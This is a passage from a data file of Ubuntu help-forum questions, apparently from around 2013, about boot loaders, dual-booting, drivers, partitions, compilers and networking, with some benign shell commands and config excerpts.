seen people mention that the drivers could be an issue here ) . so , any suggestions on how to solve this ? my preference up to now was to find a solution that does n't involve hacking on configuration files , etc. , but perhaps this is unavoidable ?
325712	should i use caution while doing updates via ubuntu update manager or not ?	i am relatively new to ubuntu and wanted to know whether the updates listed in ubuntu update manager be done without any thoughts or should i take a look at them before installing ? there are around 630 something updates currently so taking a look at each of them individually might take a while . do i need to ?
325721	failed to download package files check internet connection	i recently installed ubuntu 12.04 by wubi installer.by giving right details of proxy in firefox i am able to access internet but when i try to download something , ubuntu gives the error `` failed to download package files check your internet connection. '' . how should this error be resolved ?
325723	how do i remove youtube sidebar integration ?	i accidentally agreed to allow firefox to 'integrate ' youtube with my desktop sidebar and now i want to get rid of it . how do i do this ?
325727	error opening calendar from calendar-indicator	it worked a few days ago and now it throws me this error , while i click on show calendar : traceback ( most recent call last ) : file `` /usr/share/calendar-indicator/calendarindicator.py '' , line 361 , in menu_show_calendar_response cd = calendarwindow ( self.googlecalendar , calendar_id=self.calendar_id ) file `` /usr/share/calendar-indicator/calendarwindow.py '' , line 233 , in __init__ self.set_date ( ) file `` /usr/share/calendar-indicator/calendarwindow.py '' , line 272 , in set_date print ( aevent [ 'summary ' ] ) keyerror : 'summary' i have ubuntu 13.04 os does anyone know what 's wrong and how to fix it ?
325729	ubuntu 13.04 updates	what are the major differences between ubuntu 12.04 and 13.04 ? that is the major reason to upgrade from 12.04 to 13.04 . is it related only to software or also hardware ?
325731	xubuntu 12.04 or xubuntu 12.04.2	my computer , a hp d260 mt brand machine has the following specs : pentium 4 processor @ 3.0 ghz on-board intel 82865g graphics controller 1 gb ram it is bios supported can anyone tell me should i choose xubuntu 12.04 or xubuntu 12.04.2 thank you my computer has xp and ubuntu 10.04 installed.and hid the grub with windows as default and i am not able to access ubuntu .
325735	wine on 64bit ubuntu or wine64 ?	if i run wine 1.6 on 64bit ubuntu will i still get 64bit processing benefits ? or will i have to install wine64 to get the extra power ? also , if i do need to install wine64 , is there a great , somewhat current , link out there on installing it ? wine 1.6 was recently released and the wiki apparently does n't tell you that you need to download the source and setup a file structure . thanks ! edited : so i have been researching more and downloaded the wine source to look through the configure file . are the steps under wow64 for setting up file structure ? http : //wiki.winehq.org/wine64 also , where do i put the source so it builds in the right place ? i should have the prerequisites and i checked my gcc . i 'm just trying to get this in one go since my last source build left a mess .
325740	what are the features of an application that become a core/pre-installed/default ubuntu application ?	for example there is a lot of text editors , media players , text editors , mail clients , etc , but only one of each group is selected to be delivered as pre-installed in the next version of ubuntu . so , i 'd like to know how are those applications rated to become a pre-installed application ? do it need to be not that great so that applications other developers have written have the chance to be installed by the user ? for example , let 's say that the application aaa is the best of its group , but if this application is used as default/pre-installed , other applications from the same group will probably not be installed by the users because they will know that aaa is the best .
325747	how to configure ubuntu to load shared hard disk at startup ?	i use shared profile for firefox between windows 7 and ubuntu 12.04 . the shared profile is in a common disk partition/file-system . due to this reason firefox does n't start till i load the shared hard disk in ubuntu . i have ubuntu 12.04 installed inside windows-7 using wubi . the shared drive i am talking about is actually the other disk partitions in windows . i wanted to know how to configure ubuntu so that it automatically loads the shared disk partition/file-system at startup ? i read this question . my result for sudo blkid is /dev/loop0 : uuid= '' 4b7302d4-3802-433e-8208-2cbd0a0c2ea1 '' type= '' ext4 '' /dev/sda1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 5450-4444 '' type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' 3e3a243d3a23f097 '' type= '' ntfs '' /dev/sda3 : label= '' os '' uuid= '' f25608385607ffd9 '' type= '' ntfs '' /dev/sda5 : uuid= '' 5ab27043b2702623 '' type= '' ntfs '' how do i find which of these to use in the startup command ? i have absolutely no idea which of the above 5 have the firefox profile . i know it is in e : drive in windows 7 . in ubuntu it is shown as 141 gb file system and at the top a number 5ab2704 something is present . how to find out which of the above 5 is the file-system that i want .
325749	juju bootstrap not working for maas	i 'm following this doc to implement openstack using maas and juju : ubuntu cloud infrastructure with maas and juju so to setup juju , im following this one : get started with juju any idea about how to fix this one ? root @ ubuntu : ~/.juju # juju status -e maas -v 2013-07-28 17:31:47 error juju supercommand.go:235 command failed : file 'provider- state ' not found not found error : file 'provider-state ' not found not found root @ ubuntu : ~/.juju # juju bootstrap -e maas -v 2013-07-28 17:36:27 error juju supercommand.go:235 command failed : can not create bootstrap state file : gomaasapi : got error back from server : 400 bad request error : can not create bootstrap state file : gomaasapi : got error back from server : 400 bad request maas section of environments.yaml maas : type : maas # change this to where your maas server lives . it must specify the base path . maas-server : 'http : //192.168.119.140/maas' maas-oauth : '********hidden****8 : p6srrdd57rckefjeea2r' admin-secret : fa4fb05****hidden*****e6f2d3fd29cb1f default-series : precise authorized-keys-path : ~/.ssh/authorized_keys # or any file you want . and it seems this bug is fixed but i am still facing this issue with the latest version of juju : bug description
325751	logical swap shown as 2 separate partitions . extended and swap	i would like to ask why ubuntu disk utility shows my 12gb logical swap partition , as if there were 2 different partitions ? i just set 12gb for swap and made it logical . was this a wrong decision ? why diskutility shows it as 2 separate 12gb parts ? ? ? says one is sda1 extended and sda5 logical divided in 2 parts.please help ...
325753	problems activating calc 4.1.0.4 extension	how do i fix : ( com.sun.star.uno.runtimeexception ) { { message = `` python-loader : < type 'exceptions.importerror ' > : no module named pythonloader , traceback follows\x000ano traceback available\x000a '' , context = ( com.sun.star.uno.xinterface ) @ 0 } } i 'm trying to install calc 4.0.1 in libre office suite version : 4.1.0.4 thanks in advance , stevep
325757	google chrome themes are not transparent	i 'm running ubuntu 12.04 64-bit and google chrome version 28.0.1500.71 ( the latest as of this writing ) . there are a lot of themes with transparency in the chrome web store , but they never work on my system . what kind of configuration am i missing to make transparent themes work in chrome ? here is an example of a theme that should be transparent but is not : on my system ( the dark gray title-bar is not transparent ) : from my about : gpu page ( before enabling flags and messing with stuff ) : about : gpu page ( after messing with stuff )
325765	what is the terminal command to show desktop ?	in xubuntu 13.04 there is a show desktop panel plugin . i 'd like to make a keyboard shortcut for this functionality . how can i activate show desktop with a terminal command ?
325766	can not install ubuntu 13.04 , install terminates and windows loads	i have a win 7 laptop tried ubuntu worked fine but when i try to install the laptop restarts and windows loads i really wanted to have ubuntu . all drivers are up to date could someone help me out with this
325771	hd5450 `` this driver is actived but currently not in use ''	i do n't understand why i ca n't find the answer to the simple question of how to get a driver status changed from `` activated but currently not in use '' to in use . install directions are not what i am looking for here , the drivers are already installed , i just need to get them to be used ! i have tried installing the proprietary drivers only to have segmentation faults when i ran startx . as well as `` low graphics mode '' warnings via lightdm . i just want the hdmi port to work on my ubuntu server , so i can watch the traffic logs on my big screen . please help with simple directions on how to switch from the currently used drivers to the `` currently not use '' drivers . there must be some config file to edit . i do n't want uninstall and reinstall directions .
325776	why do i get this unusual powertop readings ?	i 'm using powertop v2.1 in ubuntu 13.04 and i 'm getting some pretty strange readings . i 've already run powertop -- calibrate too . the main screen reads this : as you can see , the power estimates do add up to about 12.8w , perhaps a bit more . however , the device 'usb device : usb2.0-crw ( generic ) ' is reporting a shocking 8.7w of usage . i believe this is the sd card reader on my laptop , i 'd like to try to disable it but am not sure how . but i 'm also fairly certain this number ca n't be right - even at 100 % usage i do n't think it 's going to use 8.7w , and there 's no way that power hogs like wlan0 and chromium-browser and perhaps compiz are using less than 1w . can anyone offer their thoughts about what might be wrong and what steps i can take to reduce power usage and/or get powertop to report correctly ?
325781	blue screens from windows to ubuntu	will a machine running windows 7 that gets bluescreens get errors of any kind with a complete disk wipe and installation of ubuntu ?
325783	uninstall lubuntu 13.04 to not interfere with built in win 7 installer	due to software problems , i need to uninstall lubuntu 13.04 off of my computer . it is a vaio and has a built in function to install windows 7 from scratch without a disk , i usually use this when i need to reinstall windows so it works pretty well . about two years ago i had lubuntu installed and had to switch back to windows . when i used the restore function it gave me an error along the lines of `` failed to save grub '' ( i dont remember the exact text ) . apparently this had to do with lubuntu not being removed properly . luckily i had a win 7 recovery disk lying around and used command prompt to fix the problem . unfortunately i no longer have a recovery disk , is there a way to properly uninstall lubuntu so that the built in windows install can properly work ?
325787	can i do something with my partitions so i can install windows along ubuntu ?	i had windows and installed ubuntu on top of them . somehow grub would n't recognize windows . so i erased windows partition and attempted to reinstall it , however windows would pop error messages like `` the partition is not windows-compatible '' . screenshot of my partitions : sda1 - > ubuntu sda5 - > ubuntu swap sda6 - > a previously installed ubuntu version-not using it anymore sda7 - > only data , no os i could potentially delete all partitions if needed except my data partition ( sda7 ) . that 's all i know about it , i am pretty clueless about boot partitions etc . : /
325788	windows 8 does n't appear in the bootloader after installing ubuntu 13.04	on my windows 8 pc i installed ubuntu 13.04 through usb . after that no option to select windows 8 was in the bootloader . how can i add windows 8 to the bootloader ?
325793	ubuntu server 13.04 ssh keygen issue	i want to be able to use github and their service hooks to deploy sites and apps to the server . to do this i need to create an ssh key and put the public key into github . i go through the ssh-keygen process on the ubuntu server and it says that the key has been generated and saved in /home/'myusername'/id_something i ca n't remember . but when i open that file with nano it is an empty file . googling that problem brings up one person with a similar problem who said it was caused by there being too many processes running that it could n't write to the file but this is a brand new server with 80 gb disk , 2 gb ram and 2 core processor and it has literally nothing else running .
325796	integrating moc/p ( music on console player ) with sound menu	i have used coverglobus ( http : //gloobus.net/coverglobus/ ) which i had configured with moc so that the basic track operations such as next , previous , pause and play can be controlled . i was wondering whether it 's possible to control the moc from sound menu as well . if yes , how can i achieve it ? i 'm using ubuntu 13.04 .
325799	gcc 4.7.3 uninstall	how can i uninstall gcc 4.7.3 and install gcc 4.5 ? i want to install 4.5 because otherwise my bf 1942 wont open with wine .
325805	unable to boot windows after installation	i have a windows 8 computer with uefi . here is how i tried to install ubuntu : • disabled secure boot , loaded live usb with 12.10 x64 • created 30.0gb partition in windows for ubuntu • installed ubuntu • during installation : the wizard asked me if i wanted to create a swap partition . i was told by a previous guide not to use the wizard partition manager , but i thought creating a swap would be a good idea . so i made a with 500mb swap partition . after installation , i installed boot repair . now grub starts up perfectly fine on startup , but when selecting windows 8 , i only come to a hp boot repair screen , which is futile . so here are my problems : • i can not access the partition with my windows 8 files through the hp backup software partition . • i can not boot into windows 8 . • i can not access the windows 8 partition through ubuntu to rescue my files . i believe it is because i created a swap partition , and now i am stuck . formatting my hard drive is my last resort . i at least want to backup my files from my windows 8 partition .
325807	arrow keys , tab-complete not working	i have installed ubuntu minimal ( mini.iso ) on my vm . i then used recovery mode to login as root and create an account with useradd -m admin and then set a password with passwd admin . when i login on the new account , instead of the normal prompt i only see a $ sign . if i try to tab-complete a command or file name it prints a normal tab . if i try to use the arrow keys it prints ^ [ [ a , ^ [ [ b , ^ [ [ c or ^ [ [ d. also , ls no longer adds colors . none of these problems were in recovery mode . how can i fix this ?
325809	download repository information failed	i am new here for ubuntu . i dont know how to work ubuntu . what is the process of download and install any software in ubuntu . it seems every time i install any software .
325810	disable kde launcher - browser history integration	whenever i search for something in kde 's kickoff application launcher , it also search in my browser history ( both firefox and chromium ) . i already disabled nepomuk and selected `` do not remember '' under system settings - activities - privacy . but it still shows my browser history . how can i disable this ?
325814	problems with read only folders	i am attempting to do a full back up using grsync ( i am using ubuntu 12.04 . however some folders are read only - i have tried changing them in the permissions but this does not seem to work . is there anything i can do in terminal to ensure all the sub foldlers and file in one specific folder have read/write access ? i 've found these instructions but do n't know where the hell to be begin : https : //help.ubuntu.com/community/filepermissions
325816	my laptop is getting really hot after installing ubuntu	i know that this question has been asked often here but i need you guys to help ! after installing ubuntu 12.04 lts my laptop is getting so hot ! the laptop details are : intel pentinum t4500 2,3 ghz , ati mobility radeon hd 4570 4gb ddr3 if you could find a solution please tell me in steps ! i also installed the driver from ati no change : l
325820	changing default gcc compiler in 12.04	i just downgraded from 13.04 , which seems to have some stability problems right now , and moved back to 12.04.lts . i installed the gcc 4.8 compiler , which is not the default gcc compiler on 12.04 . i need this compiler to get all the c++ 11 features it supports and were there by default with the compiler that comes with 13.04 , using the â-std=c++11 ' switch . so now i have 4.8 compiler installed , but i ca n't figure out how to make applications understand that the new compiler should be used for gcc/g++ instead of the default gcc compiler that comes with 12.04 ( 4.4.x ? ) . how do i do this ? i saw somewhere that update-alternatives would do it . but i do n't know to how use it to set the new gcc compiler to be the system default .
325822	why has the size of my initrd.gz increased ?	i am trying to update the version of busybox in the ubuntu netboot initrd.gz . i followed the instructions mentioned here . extract the contents of the initrd : mkdir initrd-tmp cd initrd-tmp gzip -dc ../initrd.gz | cpio -id modify the files repack them into a new initrd : find . | cpio -- quiet -- dereference -o -h newc | gzip -9 > ../new-initrd.gz the initial initrd was ~19mb . the recreated new-initrd.gz is ~89mb . what has happened ? how do i get a smaller file size ? all i did was add one ~800kb file . could it be because of symbolic links referring to files on the host file system ? # file initrd.gz initrd.gz : gzip compressed data , was `` initrd '' , from unix , last modified : fri apr 19 00:28:16 2013 , max compression # file new-initrd.gz new-initrd.gz : gzip compressed data , from unix , last modified : sun jul 28 15:45:55 2013 , max compression is the only difference i see .
325824	installing ubuntu on a dell with windows 8 for dual booting	i realize many such questions have been asked and answered . but the answers are still above most peoples heads ( at least mine ! ) i 'm new to this and when the prompt says no os detected that is where i stop . ( i do n't want to screw up windows on a brand new laptop ; they make it difficult to get warranty service if you delete windows ) . i am able to go to bios and put the laptop in legacy mode and disable secure boot and uefi whatever but still no os is detected . therefore ubuntu could not at this point install side by side . i am a `` prompt follower '' and simply ca n't follow anything beyond this . ( ubuntu is designed to follow prompts , that is its popular purpose - a 'for the masses os ' . ) i remain stuck at the prompt where it says no os detected .
325825	refresh install on dual boot system - grub2 question	how does grub2 work on existing dual boots ? on a 2 disk system , with a dual boot with windows , i want to do a new install of 13.04 to refresh the current one . in the install , if i put a grub2 boot loader on the 2nd disk , will i still be able to boot into win xp ? does the 2nd boot loader link up with the first ? hans
325826	after downloading a program file from the internet how do you install it ?	i have downloaded flash player 11.5.0 into my downloads . how do i install it ? it is a tar.gz file . please easy steps through the terminal . i am new to linux , and want to learn more about it .
325829	how do i use wine after downloading bluestack to my laptop ?	i would like to see if bluestack is compatible . i have downloaded the program wine and i have downloaded the program bluestack . how do i install bluestack through wine ?
325830	displaying at 1080i instead of 1080p	i am trying to get my display working at 1080p instead of 1080i , i have no problem with this on my xbox or in windows 7 and i can sort of put together a solution that is already on this website . i am using a 23 '' 1080p hdtv as my monitor and my graphics card is a ati radeon hd 6850 . i am currently using the xorg drivers for it but from what i have tried it does not work in the proprietary drivers either . i am aware that this question has already been answered here : no 1080p @ 60hz option with nvidia card , but there is one problem that i am having with the fix , it is that the file path to the xorg.conf file must have been moved as when i try to open it , it creates a new document . i would be thankful for the knowledge of where this file is or if i have to edit anything different . thanks in advance , jack
325832	convert mp3 to ogg ?	i want to convert my entire music library to ogg format from mp3 . while keeping the folder/file format i have under music and keep the tags that are on them .
325834	can i install intel smart response technology ?	i already installed ubuntu in my system . i have 1 500gb hdd and 64gb ssd in the system . my ubuntu installed in hdd . can i have intel rst without sacrificing my ubuntu ? ? rst = rapid storage technology .
325839	file error /boot/grub/i386-pc/normal.mod trying to repair boot , live dvd install probleml	i have seen that there are a lot of threads about this problem . i had windows 8 installed on my series 3 samsung i5 computer and i tried to install ubuntu 13.04 . this is what i did : because of the secure boot i ca n't install ubuntu from the dvd . so i went in the bios and disabled secure boot and enabled ''csm '' . i went out of the bios and windows 8 could n't boot more . so i follow a guide on this thread ( installing on a pre-installed windows 8 system ( uefi supported ) ) and on ubuntu i tried to repair the boot by inserting this code in the terminal : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install boot-repair then i ran boot-repair and i follow all the steps . then i reboot the sistem and saw the black screen that says : error : file '/boot/grub/i386-pc/normal mod ' not found grub rescure > now i saw a lot of guides about this problem but i ca n't understand how to reistall ubuntu trough the live dvd that i used to install it the first time ... i put it in the computer but nothing appears.. so what should i do now ? i 'm a noob on ubuntu and i have read all the things about this grub 2 install and know where the problem comes from but how to start the dvd ? ?
325842	plugin finder ca n't find plugin	i 've just got a new version of ubuntu 12.4 running . i 'm having a bit of a problem with the plugin finder not finding the plug in it 's looking for . i notice it mainly in firefox ( maybe that 's the only place it would look for a plugin ) . can any one tell me what might be the problem ? thank you much . -- jim
325844	why this .pam_environment setting prevents me from logging in ?	i 'm trying to move things from my .bashrc to .pam_enviroment because of this . i 've put the following into my .pam_environment but this prevents me from logging in because there should be some mistake . i 've then removed .pam_environment while in recovery mode . visual default=/usr/local/bin/vim editor default=/usr/local/bin/vim path default=/usr/local/src/rbenv/bin : $ path workon_home default= $ home/.virtualenv goroot default=/usr/local/src/go path default= $ path : $ goroot/bin gopath default= $ home/.go path default= $ path : $ gopath/bin path default= $ path : /usr/local/src/llvm/tools/clang/tools/scan-build path default= $ path : /usr/local/src/llvm/tools/clang/tools/scan-view path default= $ path : /usr/local/src/.build/kint/bin m2_home default=/opt/apache-maven/apache-maven-3.0.5 m2 default= $ m2_home/bin path default= $ m2 : $ path java_home default=/usr/lib/jvm/default-java path default= $ java_home/bin : $ path eclipse_home default=/opt/eclipse path default= $ eclipse_home : $ path what 's the problem with these settings ? as i said in my previous question , i 'm still trying to figure out a good way to have global settings for all my applications , as it worked before when .profile/.bashrc was enough for this ...
325854	how do i get firefox to scroll down when selecting content	how can i get firefox to scroll down when i 'm selecting more than one page of content ? i see this is a bug that was fixed once , but re-emerged . see a partial solution below .
325856	laptop bluetooth not working	i have an msi cr41 laptop , which has a bluetooth 4.0 , before i was using windows , but just recently i decided to totally leave windows and switch to the open source and i chose ubuntu as my new os . almost all of my hardware are properly working aside from my bluetooth , i could n't find any bluetooth devices nor get discovered by another device . i am sure that my laptop and other bluetooth devices are in discoverable mode . i had done a lot of tweaks with the help of forums and this website . i have already installed the blueman and also see ( via the ubuntu software center ) that all of the other stuff related to bluetooth are already installed by simply searching for the word bluetooth . details : laptop model : msi cr41 os version : ubuntu 13.04 so that is my big problem , how can i gain back my bluetooth ? because i badly needed this , this is what i used to transfer files from my phone to my laptop and vice versa . looking forward for some help , thank you very much .
325862	how to force native resolution on secondary monitor ?	so , yesterday i installed ubuntu on my laptop ( 1920x1200 ) , which i mainly use docked with a second monitor ( viewsonic va720 , vga , 1280x1024 ) . at first the second monitor was n't detected at all , so i installed the nvidia-313 driver ( i am currently running the nvidia-310 driver , figured i 'd see if it made a difference ; it did not . ) well , the monitor is now detected , however the native resolution is not an option . it only allows the display to work in 1024x768 . i 've tried creating a new mode in the terminal under 'xrandr ' , however when i try adding the mode to my monitor ( vga-0 ) the output is : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 i 've tried editing my resolution in 'nvidia xserver settings ' , however when i set the 'viewportin ' and 'panning ' to their proper values it wo n't allow me to change the value of 'viewportout ' . i then end up with this . my gpu is the nvidia quadro fx 770m ; any more information that would help will happily be provided , just ask . iechyd da !
325864	unable to partition disk in ubuntu 13.04	i have been using win 7 but recently i had this desire of installing ubuntu , so i tried installing it alongside windows but due to having dynamic volumes i was unable to install it . therefore , i formatted the whole system and installed ubuntu 13.04 . now the problem is when i was installing ubuntu , it did n't ask for disk partitioning and just installed . so now when i installed gparted in ubuntu , i got this result . so now firstly i need to know what this means ? ? please answer comparing with windows because i am new to ubuntu . and secondly , can i partition this space into volumes like we have in windows ? sorry if i have been not clear ... . would be thankful for any views ... thanks a lot in advance .
325869	ubuntu 13.04 screen problems	okay , i have n't seen anyone else ask this question yet , but i may have just overlooked it . i just installed ubuntu 13.04 on my hp laptop and i 'm having some pretty annoying graphical problems . sometimes , my bar at the top of the screen will just go transparent , my icons in my launch bar flicker and disappear , and if i try to play minecraft , i ca n't see because of the weird graphical glitches . i wish i could post images , but my rep on here is n't high enough . any help is appreciated .
325870	ubuntu fqdn not pingable on windows network	my problem is that my ubuntu machine seems to have its fqdn setup correctly , yet i can not ping the fqdn from a windows machine on the same network . output of various commands on my ubuntu machine : hostname : test hostname -d : testdomain.com hostname -f : test.testdomain.com my ubuntu version is 13.04 . relevant line in /etc/hosts : 127.0.1.1 test.testdomain.com test hosts line from /etc/nsswitch.conf : hosts : files dns line from /etc/dhcp/dhclient.conf : send host-name = gethostname ( ) ; now , my network uses windows dns servers and i found this bug report that contains what looks like a relevant issue . it was fixed in isc-dhcp - 4.2.4-1ubuntu10.2 ubuntu 13.04 comes with 4.2.4-5ubuntu2 my question is : how do i get this to work so that the windows dns server gets successfully updated with the ip address and fqdn of the ubuntu machine ?
325871	can you put ubuntu on a disk as a boot disk to make another computer use it for operation	i currently have a computer on which i want to replace operating system . is it possible to burn ubuntu to a disk as a boot installer so i can install it on my computer ?
325872	ubuntu : unattended apt-get upgrade : grub install dialog	people have run into this issue before : how to select grub install device what do i select for `` grub install devices '' after an update ? but they were n't looking for an unattended solution . windows 7 + virtual box 4.2.16 + vagrant 1.2.2 i 'm creating an unattended vagrant install/upgrade for precise64 ( ubuntu 12.04 lts server 64 ) . my vagrantfile specifies to install precise64 image and then kick-off boostrap.sh bootstrap.sh apt-get update -y apt-get upgrade -y things proceed along swimmingly until apt-get upgrade -y eventually pops-up this grup dialog : the grub boot loader was previously installed to a disk that is no longer present , ... based on the forum posts referenced above , i know this to be a bogus warning and even if /dev/sda is selected for grub install device , the only way out of the dialog is to specify that grub not be installed . however , i need a way to blow through this dialog for an unattended ubuntu install/update/upgrade . any ideas ?
325874	encrypted installation with unencrypted kernel and bootloader on usb flash drive	i have searched a lot . the manual partitioning in the ubuntu install is so confusing to me . i am new to linux . i come from a truecrypt-full-disk-encrypted windows installation and i boot from cd every time , which uses the bootloader on cd . i understand that when i install ubuntu i can encrypt the installation hard drive , but i can choose to install bootloader and kernel ( and leave them unencrypted ) on a usb flash drive for maximum security . i just ca n't figure out all the options . lvm volume , encrypted volume ... i am so confused . is my scenario possible and is there already a guide out there to achieve it ? i tried manual partitioning and choosing usb flash drive partition as `` mounts in /boot '' but it never boots when i try to boot from that usb . i am doing something wrong . thank you so much , bert
325877	cant remove ubuntu	i have ubuntu loaded on a hard drive it is the only thing on the drive i dont have windows loaded or have a windows disk how can i remove ubuntu or format the drive . if you have the time i would appreciate a reply to my email thank you in advance roger
325878	how do i choose the font/s i want in what programs i want ?	as recommended by bobby phoenix , i had copied the fonts folder from windows to ubuntu and put it on my desktop . i installed fonty python from the usc and i then made a pog of the fonts i want to include in mozilla thunderbird ( to start ) . how ( by what process/es ) are the new fonts ( within the newly created pog ) placed within the particular program that i want ( in this case thunderbird ) ? p.s . what does pog stand for ? p.p.s.thanks for your help bobby
325892	error while booting ubuntu	i have a dell vostro 1550 laptop with an intel core i3 processor running ubuntu 12.04 64-bit . it shows me the error message : ( initramfs ) unable to find a medium containing a live file system . in busybox , and it also says : enter 'help ' for a list of built-in commands .
325894	unrar : resulting files vanishing	ok , so i have a directory which contains a whole load of folders containing rar files , which i 'd like to use a script to recursively unrar . the script i have seems to work ( extracting the resulting file to the directory/folder from which it 's run from ) , however once it 's finished extracting the file - it vanishes , and moves onto the next one , which vanishes also . regardless , the resulting un-extracted file keeps vanishing - and i have no idea why . does n't matter if i 'm running the script with the user michaelh , or using sudo do to it . my thinking is this is a permissions error somewhere , but i 'll be dammed if i know where . however , it might be something else too - hence the reason for asking here . script for f in `find /media/michaelh/grill-g/video/to_sort -wholename *.rar` do rar e -inul $ f done example of directory structure and permissions michaelh @ grill : /media/michaelh/grill-g/video/to_sort $ ls -als total 421624 8 drwxrwxrwx 132 michaelh michaelh 8192 jul 29 10:56 . 4 drwxrwxrwx 4 michaelh michaelh 4096 jul 19 18:42 .. 4 drwxrwxrwx 2 michaelh michaelh 4096 jul 27 03:47 foldername michaelh @ grill : /media/michaelh/grill-g/video/to_sort/foldername $ ls -als total 243556 4 drwxrwxrwx 3 michaelh michaelh 4096 jul 26 01:22 . 8 drwxrwxrwx 132 michaelh michaelh 8192 jul 29 10:58 .. 4 -rw-rw-r -- 1 michaelh michaelh 1030 jul 26 01:22 foldername.nfo 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:22 foldername.r00 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:45 foldername.r01 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:38 foldername.r02 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 05:29 foldername.r03 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:33 foldername.r04 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 05:23 foldername.r05 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 04:50 foldername.r06 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:28 foldername.r07 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:29 foldername.r08 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 05:17 foldername.r09 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:28 foldername.r10 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:29 foldername.r11 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 01:26 foldername.r12 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 05:01 foldername.r13 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 05:12 foldername.r14 8780 -rw-rw-r -- 1 michaelh michaelh 8970889 jul 26 01:13 foldername.r15 14672 -rw-rw-r -- 1 michaelh michaelh 15000000 jul 26 05:28 foldername.rar 4 -rw-rw-r -- 1 michaelh michaelh 969 jul 25 22:02 foldername.sfv
325896	letters in native mode seem too small on my monitor	i have a problem . i have a lg monitor flatron w2242s and my graphic card is nvidia gt 220 . native resolution for my monitor is 1680x1050 , but when i use that resolution it feels like `` sand '' in the eyes because letters are too small and have like `` points '' , but if i choose for example 1024/768 screen is blurry , i 've installed nvidia drivers but did n't help 多what can i do ?
325897	networking problems	i run ubuntu 12.04 on my laptop as a small webserver . for many months , everything went prefectly , but when i moved it to an other house with an other internet connection , it started to boot slowly , showing the message `` waiting for network configuration '' . i know i edited the /etc/network/interfaces , but i ca n't recall what i have modified . obviously , i ca n't get any internet connection . here is the /etc/network/interfaces as it is right now : # this file ... # and how to ... # the loopback ... auto lo p2p1 iface lo inet loopback # the primary ... auto p2p1 iface p2p1 inet dhcp when i type ifconfig -a | grep p2p1 i get p2p1 link encap : ethernet hwaddr e8:40 : f2 : df:1c : a6 when i type lshw -class network i get *-network disabled description : ethernet interface ( somme other stuff ) serial e8:40 : f2 : df:1c : a6 edit : typing ifconfig gives only info about the local loopback and nothing about eth0 . edit 2 : result of ping -c 3 google.com ping google.com ( 74.125.226.195 ) 56 ( 84 ) bytes of data . 64 bytes from lga15s28-in-f3.1e100.net ( 74.125.226.195 ) : icmp_req=1 ttl=52 time=28.3ms 64 bytes from lga15s28-in-f3.1e100.net ( 74.125.226.195 ) : icmp_req=2 ttl=52 time=26.7ms 64 bytes from lga15s28-in-f3.1e100.net ( 74.125.226.195 ) : icmp_req=3 ttl=52 time=28.2ms -- - google.com ping statistics -- - 3 packets transmitted , 3 recieved , 0 % packet loss , time 2002ms rtt min/avg/max/mdev = 26.713/27.743/28.302/0.754 ms therefore , i can decuce that there is an internet connection , which is good news . starting the computer still gives the same error message . edit 3 : when shutting down , i get this error message ( it might be related ) : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername edit 4 : on startup , i also get starting configure network device [ fail ] starting configure virtual network devices [ fail ] typing ifconfig p2p1 gives p2p1 link encap : ethernet hwaddr e8:40 : f2 : df:1c : a6 inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ea40 : f2ff : fedf:1ca6/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:37 errors:0 dropped:0 everruns:0 frame:0 tx packets:17 errors:0 dropped:0 everruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7839 ( 7.8 kb ) tx bytes:1623 ( 1.6 kb ) ... but ifconfig alone will only give info about the local loopback any advise to solve this problem ? thanks !
325900	newbie needs some advice	i am new to ubuntu and am curious as to the best way to go about installing it . i currently have : toshiba satellite a300 psaj0c-sh308c running windows vista home edition is it better to wipe the hard drive completely and freshly install ubuntu ? or is it better to just install on top of it ? i want to do a fresh install as it just seems better but i am concerned that if i cleanse my hard drive that i will no longer have full functionality of my pc since i will be missing my drivers ( eg wireless ) . all of the drivers on the toshiba website are for windows . please advise . thanks .
325903	is it possible to add the rhythmbox volume controls in the sound menu ?	i can see rhythmbox pause/play controls in sound menu . but i also want the rhythmbox volume slider controls ( as opposed to master volume controls ) . is it possible to add them under sound menu or are there any alternatives ? ( i 'm on ubuntu 12.04 ) . i saw some articles about `` panflute '' but it seems to have been abandoned .
325906	ubuntu 13.04 64 bit install with win 7-64 - no os found	i attempted to install ubuntu 13.04 with windows 7 64 bit on an hp dv7t-7000 notebook . the ubuntu installer was unable to identify the existing windows installation . i have two hard drives installed and i think it did not even see the first one possibly because it is guid and the notebook is using uefi .
325907	lubuntu wo n't load	i am using lubuntu 13.04 because my computer will not run the latest version of opensuse . it worked fine at the start , but the first time i shut down the computer and turn it on again , firefox crashes when it starts . the lubuntu software centre ca n't open , and gdebi and synaptic both crash when they start . flash does not work because i am using chromium . my computer specs are : 120gb 5400rpm hdd nvidia quadro mxr/ex gpu intel pentium 3 xeon 996.3 mhz overclocked cpu 507 mb ram can anyone help me ? edit previously i was having system errors frequently , but i thought those did n't matter . after i used chromium to edit my post , the system crashed . now my system will not run . i do not have to want to use my secondary computer running w7 ( lol i prefer slow against fast ) for everything . maybe i should install a different os ? or is there a fix ?
